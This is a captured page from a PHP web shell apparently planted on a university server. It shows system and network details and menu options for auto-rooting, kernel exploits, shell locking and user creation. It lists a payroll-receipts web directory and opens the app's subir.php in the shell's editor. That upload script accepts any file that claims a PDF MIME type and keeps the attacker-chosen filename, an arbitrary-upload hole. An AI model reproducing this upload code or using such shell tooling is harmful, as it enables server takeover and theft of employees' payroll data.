Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
recibos /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxr-x
ftp
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
leerpdf
[ DIR ]
drwxrwxr-x
pdf
[ DIR ]
drwxrwxr-x
pdfs
[ DIR ]
drwxrwxr-x
recibos
[ DIR ]
drwxrwxr-x
subir
[ DIR ]
drwxrwxr-x
subir2
[ DIR ]
drwxrwxr-x
tabladinamica
[ DIR ]
drwxrwxr-x
actualiza.php
530
B
-rwxrwxr-x
admin.php
2.15
KB
-rwxrwxr-x
buscar.php
2.37
KB
-rwxrwxr-x
cabecera.php
1.08
KB
-rwxrwxr-x
conexion.php
220
B
-rwxrwxr-x
crear.php
649
B
-rwxrwxr-x
funciones.php
1.79
KB
-rwxrwxr-x
index.php
321
B
-rwxrwxr-x
login.php
3
KB
-rwxrwxr-x
nomina.12.2019.pdf
563.46
KB
-rwxrwxr-x
respaldofunciones.php
2.85
KB
-rwxrwxr-x
sample.html
604.89
KB
-rwxrwxr-x
sample.pdf
563.46
KB
-rwxrwxr-x
sample.xml
455.67
KB
-rwxrwxr-x
subir.php
529
B
-rwxrwxr-x
super.php
38
B
-rwxrwxr-x
usuario.php
3.43
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subir.php
<?php include ("respaldofunciones.php"); $archivo=$_FILES['archivo']; $final="pdfs/".$archivo["name"]; if($archivo["type"]=="application/pdf"){ move_uploaded_file($archivo["tmp_name"],$final); $json=crear($final); $data =array(); $qa=explode('.',$archivo["name"]); $data['json']=$json; $data['q']=$qa[1]; $data['a']=$qa[2]; $data['path']=$final; echo json_encode($data); }else{ echo "No se puede subir el archivo"; } ?>
Close